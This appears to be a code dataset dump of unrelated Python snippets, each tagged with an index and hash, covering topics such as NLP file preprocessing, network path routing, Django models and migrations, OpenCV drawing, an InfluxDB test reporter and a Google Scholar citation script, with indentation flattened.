embedding_weights[-1] = np.random.uniform(-1, 1, embedding_size)
return useful_word_length, embedding_weights
def create_matrix(lexicon, label_2_index):
data_index = codecs.open("data/data_index.data", 'w', 'utf-8')
label_index = codecs.open("data/label_index.data", 'w', 'utf-8')
file_chars = codecs.open("data/data.data", 'r', 'utf-8')
file_labels = codecs.open("data/label.data", 'r', 'utf-8')
chars_line = file_chars.readline()
labels_line = file_labels.readline()
while (chars_line and labels_line):
book_chars = chars_line.strip().split()
book_labels = labels_line.strip().split()
for char, label in zip(book_chars, book_labels):
data_index.write(str(lexicon[char]) + "\t")
label_index.write(str(label_2_index[label]) + "\t")
data_index.write("\n")
label_index.write("\n")
chars_line = file_chars.readline()
labels_line = file_labels.readline()
file_chars.close()
file_labels.close()
data_index.close()
label_index.close()
def padding_sentences(max_len):
data_index = codecs.open("data/data_index.data", 'r', 'utf-8')
label_index = codecs.open("data/label_index.data", 'r', 'utf-8')
data_index_padding = codecs.open("data/data_index_padding.data", 'w', 'utf-8')
label_index_padding = codecs.open("data/label_index_padding.data", 'w', 'utf-8')
data_line = data_index.readline()
while data_line:
book_data = data_line.strip().split()
book_data_len = len(book_data)
new_book_data = []
if book_data_len < max_len:
new_book_data = ([str(0)] * (max_len - book_data_len) + book_data)
else:
new_book_data = book_data
for data_word in new_book_data:
data_index_padding.write(data_word + "\t")
data_index_padding.write("\n")
data_line = data_index.readline()
label_line = label_index.readline()
while label_line:
book_label = label_line.strip().split()
book_label_len = len(book_label)
new_book_label = []
if book_label_len < max_len:
new_book_label = ([str(0)] * (max_len - book_label_len) + book_label)
else:
new_book_label = book_label
for label_word in new_book_label:
label_index_padding.write(label_word + "\t")
label_index_padding.write("\n")
label_line = label_index.readline()
data_index.close()
label_index.close()
data_index_padding.close()
label_index_padding.close()
def maxlen_2d_list():
max_len = 0
data_index = codecs.open("data/data_index.data", 'r', 'utf-8')
data_line = data_index.readline()
while data_line:
book_data = data_line.strip().split()
book_data_len = len(book_data)
if book_data_len > max_len:
max_len = book_data_len
data_line = data_index.readline()
data_index.close()
return max_len
|
9,261 | 65bcb4a2fbc05ee19c8a94811d369562ec5e72ff | from pulp import *
from collections import namedtuple
import networkx as nx
import itertools
from mcfpox.controller.lib import Flow, Hop
def get_host_from_ip(G, ip):
return next((i for i in G.nodes() if G.node[i].get('ip') == str(ip)), None)
# https://docs.python.org/2/library/itertools.html#recipes
def pairwise(iterable):
"s -> (s0,s1), (s1,s2), (s2, s3), ..."
a, b = itertools.tee(iterable)
next(b, None)
return itertools.izip(a, b)
def widest_path(G, src, dst):
S = set([src])
T = set([n for n in G.nodes() if n != src])
print S, T
N = G.nodes()
B = {}
for n in N:
b = {}
for k in N:
if k == n:
continue
try:
b[k] = G.edge[n][k]['capacity']
except KeyError:
b[k] = 0
B[n] = b
P = {n:[] for n in N}
while True:
k = None
highest = 0
neighbors = set([])
for n in S:
for m in G[n]:
if m in S:
continue
B[src][m] = G.edge[n][m]['capacity']
if B[src][m] > highest:
k = m
highest = B[src][m]
P[k] = P[n] + [k]
S.add(k)
T.remove(k)
if not T:
break
for n in T:
old = B[src][n]
new = min(B[src][k], B[k][n])
B[src][n] = max(old, new)
if new > old:
P[n] = P[k] + [n]
return P[dst]
def objective(graph, flows):
""" Return a list of paths through the graph for each flow.
Args:
graph:
A nx.Graph, annotated with network information including
IP addresses for hosts and port numbers for each link.
flows:
A list of mcfpox.controller.lib.Flow objects representing
5-tuples of flows to route through the network
Returns:
A dict mapping each flow in flows to a valid path through the graph.
The path is expressed as a list of mcfpox.controller.lib.Hop objects.
If no valid path can be found, the value for that entry is None.
"""
G = graph.copy()
rules = {}
flows.sort(key=lambda a: a[1], reverse=True)
for flow,demand in flows:
src = get_host_from_ip(G, flow.nw_src)
dst = get_host_from_ip(G, flow.nw_dst)
if not (src and dst):
continue
if not (src in G.nodes() and dst in G.nodes()):
continue
path = widest_path(G, src, dst)
hops = []
for a,b in pairwise(path):
hops.append(Hop(dpid=int(a[1:]), port=G.edge[a][b]['port']))
G.edge[a][b]['capacity'] -= demand
G.edge[b][a]['capacity'] -= demand
rules[flow] = hops
return rules
|
9,262 | 0dcf90514543a1ca801e82cd402b3e1002b1f5d0 | # aitoff projection
# see:
# https://en.wikipedia.org/wiki/Aitoff_projection
def aitoff_projection(theta, phi):
import numpy as np
# theta, phi in radian
theta = theta - np.pi
cos_phi = np.cos(phi)
denom = np.sqrt(1 + cos_phi * np.cos(theta/2))
x = 180 * cos_phi * np.sin(theta/2) / denom
x = x + 180
y = 90 * np.sin(phi) / denom
return x,y
|
9,263 | 3471f02f507104202c1e49440172f120ba17730f | from FluidStream import *
# List of chemicals and their constant properties
CHEMICALS_KEY_GUIDE = ['MW' , 'Density']
CHEMICALS = {
'Bacteria' : ['NA' , 1.05 ],
'Calcium Carbonate' : [100.087 , 2.71 ],
'Calcium Lactate' : [218.22 , 1.494 ],
'Corn Steep Liquor' : ['NA' , 1.2326],
'Glucose' : [180.156 , 1.54 ],
'Lactic Acid' : [90.08 , 1.206 ],
'Octanol' : [130.231 , .824 ],
'Tween 80' : ['NA' , 1.07 ],
'Water' : [18.015 , .995 ],
'Water/Glucose 10%' : [34.2291 , 1.0375]
}
SOLVE_FOR_PRODUCTION = True
PRODUCTION_TO_SOLVE = 100000000
def convert_mass_to_concentration(fluidStream, component):
total_mass = fluidStream.TotalMass
def component_mass_to_volume(mass, component):
component_density = CHEMICALS[component][1]
component_volume = mass*component_density
return component_volume
# Bacterial Growth Curve
# TIME_INIT --> hours
TIME_INIT = 0
# C_BACT_INIT --> g/L
C_BACT_INIT = .7
# C_GLUC_INIT --> g/L
C_GLUC_INIT = 100.0
# C_LA_INIT --> g/L
C_LA_INIT = 12.57
# C_TWEEN_INIT --> g/L
C_TWEEN_INIT = 1.0
# dBACT_dT -- > g/L*h
dBACT_dT_INIT = 0.0
FERMENT_IN = {
'Bacteria Concentration' : C_BACT_INIT,
'Glucose Concentration' : C_GLUC_INIT,
'Lactic Acid Concentration' : C_LA_INIT,
'Tween 80 Concentration' : C_TWEEN_INIT
}
# HOLDING TANK SPECS
# Initial Fermentation Water Charge in Liters
FERMENT_WATER_VOL = 750000
# Number of Fermentation Vessels
FERMENT_VESSEL_COUNT = 4
# Runtime of Fermentation Process
FERMENT_RUNTIME = 32
# Downtime of Fermentation Process
FERMENT_DOWNTIME = 8
# Total Runtime of Each Fermentation Batch
FERMENT_BATCH_TIME = FERMENT_RUNTIME + FERMENT_DOWNTIME
FERMENT_CONST = {
'Water Volume' : FERMENT_WATER_VOL,
'Vessel Count' : FERMENT_VESSEL_COUNT,
'Runtime' : FERMENT_RUNTIME,
'Downtime' : FERMENT_DOWNTIME,
'Batch Time' : FERMENT_BATCH_TIME }
# Acid Dissociation Constant Ka
SALTS_pKa = 3.86
SALTS_Ka = pow(10, (-1*SALTS_pKa))
MAX_pH = 3.8
pKa_pH_CALC = pow(10, (SALTS_pKa - MAX_pH))
MW_SALT = CHEMICALS['Calcium Lactate'][0]
MW_LA = CHEMICALS['Lactic Acid'][0]
|
9,264 | 2c1ea45d3c7ee822ec58c2fadaf7fc182acc4422 | # Generated by Django 2.1 on 2018-12-09 21:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='replays',
name='id',
),
migrations.AddField(
model_name='replays',
name='oponent',
field=models.CharField(default='', max_length=200),
preserve_default=False,
),
migrations.AddField(
model_name='replays',
name='player',
field=models.CharField(default='', max_length=200),
preserve_default=False,
),
migrations.AddField(
model_name='replays',
name='processed',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='replays',
name='title',
field=models.CharField(max_length=200, primary_key=True, serialize=False),
),
]
|
9,265 | fa948838b5c2d688fe8c748166f23ffc8e677f93 | columns = ['account',
'name',
'Death',
'archetype',
'profession',
'elite',
'phases.All.actual_boss.dps',
'phases.All.actual.dps',
'phases.All.actual_boss.flanking',
'phases.All.actual_boss.scholar',
'phases.All.actual_boss.condi_dps',
'phases.All.actual_boss.power_dps',
'phases.All.buffs.aegis',
'phases.All.buffs.alacrity',
'phases.All.buffs.assassins_presence',
'phases.All.buffs.banner_defence',
'phases.All.buffs.banner_discipline',
'phases.All.buffs.banner_strength',
'phases.All.buffs.banner_tactics',
'phases.All.buffs.empower_allies',
'phases.All.buffs.fury',
'phases.All.buffs.glyph_of_empowerment',
'phases.All.buffs.lead_attacks',
'phases.All.buffs.lotus_training',
'phases.All.buffs.might',
'phases.All.buffs.naturalistic_resonance',
'phases.All.buffs.pinpoint_distribution',
'phases.All.buffs.protection',
'phases.All.buffs.quickness',
'phases.All.buffs.regen',
'phases.All.buffs.resist',
'phases.All.buffs.retaliation',
'phases.All.buffs.soothing_mist',
'phases.All.buffs.spirit_of_frost',
'phases.All.buffs.spotter',
'phases.All.buffs.stab',
'phases.All.buffs.stone_spirit',
'phases.All.buffs.storm_spirit',
'phases.All.buffs.sun_spirit',
'phases.All.buffs.swift',
'phases.All.buffs.vampiric_presence',
'phases.All.buffs.vigor',
'phases.All.buffs_out.aegis',
'phases.All.buffs_out.alacrity',
'phases.All.buffs_out.assassins_presence',
'phases.All.buffs_out.banner_defence',
'phases.All.buffs_out.banner_discipline',
'phases.All.buffs_out.banner_strength',
'phases.All.buffs_out.banner_tactics',
'phases.All.buffs_out.empower_allies',
'phases.All.buffs_out.fury',
'phases.All.buffs_out.glyph_of_empowerment',
'phases.All.buffs_out.lead_attacks',
'phases.All.buffs_out.lotus_training',
'phases.All.buffs_out.might',
'phases.All.buffs_out.naturalistic_resonance',
'phases.All.buffs_out.pinpoint_distribution',
'phases.All.buffs_out.protection',
'phases.All.buffs_out.quickness',
'phases.All.buffs_out.regen',
'phases.All.buffs_out.resist',
'phases.All.buffs_out.retaliation',
'phases.All.buffs_out.soothing_mist',
'phases.All.buffs_out.spirit_of_frost',
'phases.All.buffs_out.spotter',
'phases.All.buffs_out.stab',
'phases.All.buffs_out.stone_spirit',
'phases.All.buffs_out.storm_spirit',
'phases.All.buffs_out.sun_spirit',
'phases.All.buffs_out.swift',
'phases.All.buffs_out.vampiric_presence',
'phases.All.buffs_out.vigor',
'phases.All.events.dead_time',
'phases.All.events.deaths',
'phases.All.events.disconnect_time',
'phases.All.events.disconnects',
'phases.All.events.down_time',
'phases.All.events.downs',
'phases.All.received.dps',
'phases.All.shielded.dps']
old_columns = ['account',
'name',
'Death',
'archetype',
'profession',
'elite',
'phases.All.actual_boss.dps',
'phases.All.actual.dps',
'phases.All.actual_boss.flanking',
'phases.All.actual_boss.scholar',
'phases.All.actual_boss.condi_dps',
'phases.All.actual_boss.power_dps',
'phases.All.buffs.alacrity',
'phases.All.buffs.assassins_presence',
'phases.All.buffs.banner_defence',
'phases.All.buffs.banner_discipline',
'phases.All.buffs.banner_strength',
'phases.All.buffs.banner_tactics',
'phases.All.buffs.empower_allies',
'phases.All.buffs.fury',
'phases.All.buffs.glyph_of_empowerment',
'phases.All.buffs.gotl',
'phases.All.buffs.lead_attacks',
'phases.All.buffs.lotus_training',
'phases.All.buffs.might',
'phases.All.buffs.naturalistic_resonance',
'phases.All.buffs.pinpoint_distribution',
'phases.All.buffs.protection',
'phases.All.buffs.quickness',
'phases.All.buffs.soothing_mist',
'phases.All.buffs.spirit_of_frost',
'phases.All.buffs.spotter',
'phases.All.buffs.stone_spirit',
'phases.All.buffs.storm_spirit',
'phases.All.buffs.sun_spirit',
'phases.All.buffs.vampiric_presence',
'phases.All.buffs_out.alacrity',
'phases.All.buffs_out.assassins_presence',
'phases.All.buffs_out.banner_defence',
'phases.All.buffs_out.banner_discipline',
'phases.All.buffs_out.banner_strength',
'phases.All.buffs_out.banner_tactics',
'phases.All.buffs_out.empower_allies',
'phases.All.buffs_out.fury',
'phases.All.buffs_out.glyph_of_empowerment',
'phases.All.buffs_out.gotl',
'phases.All.buffs_out.lead_attacks',
'phases.All.buffs_out.lotus_training',
'phases.All.buffs_out.might',
'phases.All.buffs_out.naturalistic_resonance',
'phases.All.buffs_out.pinpoint_distribution',
'phases.All.buffs_out.protection',
'phases.All.buffs_out.quickness',
'phases.All.buffs_out.retaliation',
'phases.All.buffs_out.soothing_mist',
'phases.All.buffs_out.spirit_of_frost',
'phases.All.buffs_out.spotter',
'phases.All.buffs_out.stone_spirit',
'phases.All.buffs_out.storm_spirit',
'phases.All.buffs_out.sun_spirit',
'phases.All.buffs_out.vampiric_presence',
'phases.All.events.dead_time',
'phases.All.events.deaths',
'phases.All.events.disconnect_time',
'phases.All.events.disconnects',
'phases.All.events.down_time',
'phases.All.events.downs',
'phases.All.received.dps',
'phases.All.shielded.dps']
vg_mechanics = ['phases.All.mechanics.Bullets Eaten',
'phases.All.mechanics.Teleports']
gors_mechanics = ['phases.All.mechanics.Ghastly Imprisonments',
'phases.All.mechanics.Spectral Darkness',
'phases.All.mechanics.Unmitigated Spectral Impacts']
sab_mechanics = []
sloth_mechanics = ['phases.All.mechanics.Spores Blocked',
'phases.All.mechanics.Spores Received',
'phases.All.mechanics.Tantrum Knockdowns',
'phases.All.mechanics.Toxic Cloud Breathed',
'phases.All.mechanics.Volatile Poison Carrier']
matt_mechanics = ['phases.All.mechanics.Burning Stacks Received',
'phases.All.mechanics.Corrupted',
'phases.All.mechanics.Moved While Unbalanced',
'phases.All.mechanics.Sacrificed',
'phases.All.mechanics.Shards Absorbed',
'phases.All.mechanics.Surrender',
'phases.All.mechanics.Well of the Profane Carrier']
kc_mechanics = ['phases.All.mechanics.Correct Orb',
'phases.All.mechanics.Wrong Orb']
xera_mechanics = ['phases.All.mechanics.Derangement']
cairn_mechanics = ['phases.All.mechanics.Displacement',
'phases.All.mechanics.Meteor Swarm',
'phases.All.mechanics.Shared Agony',
'phases.All.mechanics.Spatial Manipulation']
mo_mechanics = ['phases.All.mechanics.Claim',
'phases.All.mechanics.Dispel',
'phases.All.mechanics.Enemy Tile',
'phases.All.mechanics.Protect',
"phases.All.mechanics.Soldier's Aura"]
sam_mechanics = ['phases.All.mechanics.Anguished Bolt',
'phases.All.mechanics.Big Friend',
'phases.All.mechanics.Bludgeon',
'phases.All.mechanics.Charge',
'phases.All.mechanics.Claw',
'phases.All.mechanics.Fixate',
'phases.All.mechanics.Inevitable Betrayl',
'phases.All.mechanics.Prisoner Sweep',
'phases.All.mechanics.Shockwave',
'phases.All.mechanics.Small Friend',
'phases.All.mechanics.Spear Impact']
deimos_mechanics = ['phases.All.mechanics.Annihilate',
'phases.All.mechanics.Demonic Shockwave',
'phases.All.mechanics.Mind Crush',
'phases.All.mechanics.Rapid Decay',
'phases.All.mechanics.Soul Feast',
'phases.All.mechanics.Tear Consumed',
'phases.All.mechanics.Teleports']
sh_mechanics = ['phases.All.mechanics.Inner Vortex',
'phases.All.mechanics.Necrosis Received',
'phases.All.mechanics.Outer Vortex',
'phases.All.mechanics.Quad Slash',
'phases.All.mechanics.Scythe Hits',
'phases.All.mechanics.Soul Rift']
dhuum_mechanics = ['phases.All.mechanics.Death Marked',
'phases.All.mechanics.Dhuum Gaze',
'phases.All.mechanics.Fissured',
'phases.All.mechanics.Messenger',
'phases.All.mechanics.Putrid Bomb',
'phases.All.mechanics.Shackle Hits',
'phases.All.mechanics.Snatched',
'phases.All.mechanics.Sucked']
|
9,266 | 7fc239e7f44c5f6a8e5bebe3e4910aee4d8e4af3 | from django.test import TestCase
# Create your tests here.
def Add_course(self,user):
|
9,267 | 7cfbc36cc6cd6ff7c30f02d979667448f2003546 | def solution(n):
answer = []
for i in range(1,n+1):
if n % i == 0:
answer.append(i)
return sum(answer)
def solution2(n):
return sum([i for i in range(1,n+1) if n % i == 0])
print(solution(12))
print(solution(5))
print(solution2(12))
print(solution2(5))
# n return
# 12 28
# 5 6 |
9,268 | 2fd33439d4403ec72f890a1d1b4f35f2b38d033b | from enum import unique
from django.db import models
import secrets
import string
CARD_PACK_CHOICES = (
('1', 'Traditional Cards'),
('2', 'Special Cards'),
('3', 'Other Themed Cards')
)
MARKER_CHOICES = (
('1', 'Plastic Dots'),
('2', 'Quarters'),
('3', 'Beans')
)
def generate_game_code() -> int:
""" Generates a unique game code.
Returns
-------
int
- a unique 7 digit numerical code
"""
while True:
# code will only contain digits
code_options = string.digits
generated_game_code = ''.join(secrets.choice(code_options) for i in range(7))
if Game.objects.filter(game_code=generated_game_code).count() == 0:
break
return int(generated_game_code)
def generate_player_id() -> string:
"""Generates a unique player id.
Returns
-------
string
- a unique 5 digit alphaneumeric code
"""
while True:
# code will have uppercase letters and numbers
code_options = string.ascii_uppercase + string.digits
generated_player_id = ''.join(secrets.choice(code_options) for i in range(5))
if Player.objects.filter(player_id=generated_player_id).count() == 0:
break
return generated_player_id
# Create your models here.
class Game( models.Model):
""" Model that describes a loteria game
Fields
------
cards_id : int
- the id of the card theme chosen by user during creation of game.
created_at : dateTime
- the time that the game was started.
game_code : int
- a unique 7 digit code assigned during creation
needed to join games.
host : string
- the session key of the person who started the game
ensures that users do not have more that 1 running game.
game_over : bool
- defaults to True for now but will default to False upon creation.
maker_id : int
- the id of the marker type chosen by user during creation of game.
Notes
-----
- Considering making game_code primary key instead
"""
# default 0 will just be regular loteria cards
# TODO cards_id and marker_id should be choices not harded coded values
game_code = models.IntegerField(null=False, default=generate_game_code, unique=True)
created_at = models.DateTimeField(auto_now_add=True)
host = models.CharField(max_length=100, unique=True)
cards_id = models.CharField(max_length=10, choices=CARD_PACK_CHOICES, default='1')
marker_id = models.CharField(max_length=10, choices=MARKER_CHOICES, default='1')
game_over = models.BooleanField(default=True)
class Player(models.Model):
""" Model that describes a Player in the Game
Attributes
----------
name : string
the display name of the player.
wins : int
the number of times this player has won.
losses : int
the number of times this player has lost.
player_id : string
the id assigned to a player during a game.
game_code : int
the game code of the game joined, will be null if no game has been joined.
"""
player_id = models.CharField(max_length=15, default=generate_player_id, unique=True)
name = models.CharField(max_length=100, unique=False)
game_code = models.IntegerField(null=False, unique=False)
wins = models.IntegerField(null=False, default=0)
losses = models.IntegerField(null=False, default=0)
host_key = models.CharField(max_length=100, unique=True)
|
9,269 | 08c5f5ac568b7575d8082976336a5893951b53c2 | import cv2 as cv
import numpy as np
img=np.zeros((512,512,3),np.uint8)
cv.line(img,(0,0),(511,511),(255,255,255),10)
cv.rectangle(img,(384,0),(510,128),(255,0,0),3)
cv.circle(img,(200,60),20,(0,100,255),3)
cv.ellipse(img,(250,250),(100,50),90,0,180,(255,0,255),3)
font=cv.FONT_HERSHEY_SIMPLEX
cv.putText(img,'OpenCV',(10,500),font,4,(255,0,255),3)
cv.imshow('d1',img)
cv.waitKey(0)
|
9,270 | b815f72e2cad351fd9411361a0e7cc75d39ae826 | class Solution:
def eventualSafeNodes(self, graph: List[List[int]]) -> List[int]:
res = []
d = {}
def dfs(node):
if graph[node] == []:
return True
if node in d:
return d[node]
if node in visit:
return False
visit.add(node)
for nei in graph[node]:
if dfs(nei) == False:
d[node] = False
return False
d[node] = True
return True
visit = set()
for i in range(len(graph)):
if dfs(i):
res.append(i)
return res |
9,271 | 84c3427a994bd6c57d9fa8449e4fc7a3de801170 | import json
import time
from pytest_influxdb.data_manager import DataManager
class SuiteResultDTO:
__run = 'UNDEFINED'
__project = 'UNDEFINED'
__version = 'UNDEFINED'
__passed = None
__failed = None
__skipped = None
__error = None
__duration_sec = 0
__disabled = 0
__retries = 0
__suite_result_dict = {'tags': {}, 'fields': {}}
def set_run(self, run):
if run != '':
self.__run = str(run)
def set_project(self, project):
if project != '':
self.__project = str(project)
def set_version(self, version):
if version != '':
self.__version = str(version)
def set_passed(self, passed):
self.__passed = int(passed)
def set_failed(self, failed):
self.__failed = int(failed)
def set_skipped(self, skipped):
self.__skipped = int(skipped)
def set_error(self, error):
self.__error = int(error)
def set_duration_sec(self, duration_sec):
self.__duration_sec = int(duration_sec)
def set_disabled(self, disabled):
self.__disabled = int(disabled)
def set_retries(self, retries):
self.__retries = int(retries)
def set_suite_result_dict(self, suite_result_dict):
SuiteResultDTO.__suite_result_dict = suite_result_dict
def get_suite_json(self, measurement_name):
json_body = [
{
"measurement": measurement_name,
"tags": {
"run": self.__run,
"project": self.__project,
"version": self.__version
},
"fields": {
"pass": self.__passed,
"fail": self.__failed,
"skip": self.__skipped,
"error": self.__error,
"disabled": self.__disabled,
"duration_sec": self.__duration_sec,
"retries": self.__retries
}
}
]
# Appending custom values to json_body
tags_dict = SuiteResultDTO.__suite_result_dict['tags']
for key in tags_dict:
suite_tags = json_body[0]['tags']
suite_tags.update({key: tags_dict[key]})
fields_dict = SuiteResultDTO.__suite_result_dict['fields']
for key in fields_dict:
suite_fields = json_body[0]['fields']
suite_fields.update({key: fields_dict[key]})
return json_body
def set_tag_values(self, tags_dict):
suite_tags = SuiteResultDTO.__suite_result_dict
suite_tags['tags'].update(tags_dict)
def set_field_values(self, fields_dict):
suite_fields = SuiteResultDTO.__suite_result_dict
suite_fields['fields'].update(fields_dict)
def set_suite_custom_values(self, influxdb_values):
if influxdb_values and influxdb_values != '':
if isinstance(influxdb_values, str):
influxdb_values = json.loads(influxdb_values)
self.set_field_values(influxdb_values['fields']['suite_result'])
self.set_tag_values(influxdb_values['tags']['suite_result'])
def get_suite_result_dto(self, terminalreporter, global_values, influxdb_components, db_measurement_name_for_suite):
# Preparing execution time and suite results from the terminalreporter (where all the data collected)
execution_time = round(time.time() - terminalreporter._sessionstarttime)
suite_results_dict = DataManager().get_results_dict(terminalreporter.stats)
# Setting the values to the suite_result_dto instance
self.set_passed(suite_results_dict.get('passed'))
self.set_failed(suite_results_dict.get('failed'))
self.set_skipped(suite_results_dict.get('skipped'))
self.set_error(suite_results_dict.get('error'))
self.set_disabled(suite_results_dict.get('disabled'))
self.set_duration_sec(execution_time)
self.set_retries(suite_results_dict.get('reruns'))
self.set_run(global_values.get("run"))
self.set_project(global_values.get("project"))
self.set_version(global_values.get("version"))
self.set_suite_custom_values(global_values.get("influxdb_values"))
self.merge_suite_result(global_values.get('merged'), influxdb_components,
db_measurement_name_for_suite, global_values.get("run"))
return self
def merge_suite_result(self, merged_enabled, influxdb_components, db_measurement_name_for_suite, run_id_value):
# Merging the existing suite results with the suite_results from db for the same run
# if 'merged' config value is True
existing_suite_result = influxdb_components.get_results_by_run(db_measurement_name_for_suite, run_id_value)
old_suite_list = list(existing_suite_result.get_points(measurement=f'{db_measurement_name_for_suite}'))
if len(old_suite_list) != 0 and merged_enabled:
old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[0]['fail'] + old_suite_list[0][
'skip']
old_disabled_tests_count = old_suite_list[0]['disabled']
self.set_passed(
old_suite_total_count - self.__failed - self.__skipped)
self.set_disabled(old_disabled_tests_count)
influxdb_components.delete_results_by_run(db_measurement_name_for_suite, run_id_value)
|
9,272 | e3ba6395a8d7272fc7e5a8be37e6b0b18c355e14 | from rest_framework import serializers
from api.models.Phones import Phones
class PhoneSerializer(serializers.ModelSerializer):
class Meta:
model = Phones
fields = (
'id', 'number', 'area_code', 'country_code'
)
|
9,273 | d70986b016e58877c39bfbb76c5bd622c44cbca9 | from collections import namedtuple
from math import tau, sin, cos, atan2
grid = 21
c = grid / 2
points = grid**3
Velocity = namedtuple('Velocity', ('x', 'y', 'z'))
velocity = []
for k in range(grid):
for j in range(grid):
for i in range(grid):
x = (i / grid + 0.25) * tau
y = (j / grid + 0.25) * tau
z = (k / grid + 0.25) * tau
u = cos(x) * sin(y) * cos(z)
v = -sin(x) * cos(y) * cos(z)
w = 0.0
velocity.append(Velocity(u, v, w))
with open('taylor-green.vtk', 'w') as f:
f.write(f"""\
# vtk DataFile Version 2.0
test
ASCII
DATASET STRUCTURED_POINTS
DIMENSIONS {grid} {grid} {grid}
ORIGIN 0.0 0.0 0.0
SPACING 1.0 1.0 1.0
POINT_DATA {points}
VECTORS velocity float
""")
for v in velocity:
f.write(f"{v.x} {v.y} {v.z}\n")
f.write("SCALARS angle float\n")
f.write("LOOKUP_TABLE default\n")
for v in velocity:
f.write("%f\n" % atan2(v.y, v.x)) |
9,274 | 34f79fa3de68b53f19220697815e5bae5270d056 | # Generated by Django 2.1.4 on 2019-01-11 11:58
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('devisa', '0021_auto_20190110_1256'),
]
operations = [
migrations.RemoveField(
model_name='entidade',
name='bairro',
),
migrations.RemoveField(
model_name='entidade',
name='ent_cep',
),
migrations.RemoveField(
model_name='entidade',
name='ent_cnes',
),
migrations.RemoveField(
model_name='entidade',
name='ent_complemento',
),
migrations.RemoveField(
model_name='entidade',
name='ent_dt_expedicao',
),
migrations.RemoveField(
model_name='entidade',
name='ent_dt_inicio_func',
),
migrations.RemoveField(
model_name='entidade',
name='ent_email',
),
migrations.RemoveField(
model_name='entidade',
name='ent_endereco',
),
migrations.RemoveField(
model_name='entidade',
name='ent_especializacao',
),
migrations.RemoveField(
model_name='entidade',
name='ent_fantasia',
),
migrations.RemoveField(
model_name='entidade',
name='ent_fax',
),
migrations.RemoveField(
model_name='entidade',
name='ent_fone',
),
migrations.RemoveField(
model_name='entidade',
name='ent_insc_estadual',
),
migrations.RemoveField(
model_name='entidade',
name='ent_insc_municipal',
),
migrations.RemoveField(
model_name='entidade',
name='ent_numero',
),
migrations.RemoveField(
model_name='entidade',
name='ent_obj_contrato_social',
),
migrations.RemoveField(
model_name='entidade',
name='ent_observacoes',
),
migrations.RemoveField(
model_name='entidade',
name='ent_orgao_exp',
),
migrations.RemoveField(
model_name='entidade',
name='ent_pasta_num',
),
migrations.RemoveField(
model_name='entidade',
name='ent_registro_conselho',
),
migrations.RemoveField(
model_name='entidade',
name='ent_rg',
),
migrations.RemoveField(
model_name='entidade',
name='escolaridade',
),
migrations.RemoveField(
model_name='entidade',
name='formacao_profissional',
),
migrations.RemoveField(
model_name='entidade',
name='municipio',
),
migrations.RemoveField(
model_name='entidade',
name='natureza_juridica_dependencia',
),
]
|
9,275 | 9cd1cb84c457db64019fa542efcf6500aa8d6d42 | '''
Aaditya Upadhyay
oooo$$$$$$$$$$$
oo$$$$$$$$$$$$$$$$$$$$$$$o
oo$$$$$$$$$$$$$$$$$$$$$$$$$$$$$o o$ $$ o$
o $ oo o$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$o $$ $$ $o$
oo $ $ "$ o$$$$$$$$$ $$$$$$$$$$$$$ $$$$$$$$o $$o$o$
"$$$$$o$ o$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$o $$$$$$$$
$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$ $$$$$$$$$$$$$$ """$$$
"$$$""""$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ "$$$
$$$ o$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ "$$o
o$$" $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$o
$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$" "$$$$$ooooo$$$o
o$$
$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ o$$$$$$$$$$$$$$$$$
$$$$$$$$"$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$""""""""
"""" $$$$ "$$$$$$$$$$$$$$$$$$$$$$$$$$$$" o$$$
"$$o """$$$$$$$$$$$$$$$$$$"$$" $$$
$$o "$$""$$$$$$"""" o$$$
$$$o o$$$"
"$$$o o$$$$$o"$$$o o$$$$
"$$$$oo ""$$$o$$$$o o$$$$""
""$$$$
"$$o$$$$$$$$$"""
""$$$$$$oo $$$$$$$$$$
""""$$$$$$$$$$$
$$$$$$$$$$$$
$$$$$$$$$$"
"$$$""""
'''
from sys import stdin, stdout
from collections import *
from math import gcd, floor, ceil
def st(): return list(stdin.readline().strip())
def li(): return list(map(int, stdin.readline().split()))
def mp(): return map(int, stdin.readline().split())
def inp(): return int(stdin.readline())
def pr(n): return stdout.write(str(n)+"\n")
mod = 1000000007
INF = float('inf')
def solve():
def check(n):
temp = n
while temp:
x = temp % 10
temp //= 10
if x != 0:
if n % x != 0:
return False
return True
n = inp()
while True:
if check(n):
pr(n)
return
n += 1
for _ in range(inp()):
solve()
|
9,276 | 58eef45f8827df02c0aa0ac45eafa77f70f81679 | # Makes use of the scholar.py Google Scholar parser available here:
# https://github.com/ckreibich/scholar.py
# to run a list of citations collected from other sources (PubMed, PsychINFO, etc.) through
# Google Scholar to return a consistent format and saved as a .csv file.
# This can be imported into a spreadsheet for quicker sorting when conducting a literature review
# For input, the script requires a .txt document with citations to be entered in Google Scholar,
import os
import re
import subprocess
import random as r
# these may not be needed, but I have on occasion run into search limit problems with Google Scholar
# timing searches with a jittered delay may help - I'm not sure
#import time
#d = r.random()*100
#delay = 18000+d
os.chdir('/Users/ethan/Desktop/')
file = 'titles.txt'
with open(file,'r') as f:
text = f.read()
text = re.split("(?m)^\s*$\s*", text)
text = [s.replace('\n', '') for s in text]
os.chdir('/Users/ethan/Documents/Scripts/scholar.py')
citations = []
tot = len(text)
search_item = '-A ' + '"' + text[0] + '"' + ' --csv'
print search_item
for s, val in enumerate(text):
search_item = '-A ' + '"' + val + '"' + ' --csv'
count = str(s+1)
print count + ' of ' + str(tot)
proc = subprocess.Popen(['python', 'scholar.py', search_item], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
citation = proc.communicate()[0]
citation = citation.split('\n')
citation = [s.strip() for s in citation]
citation_delim = []
for s, val in enumerate(citation):
print val
item = val + '|'
citation_delim.append(item)
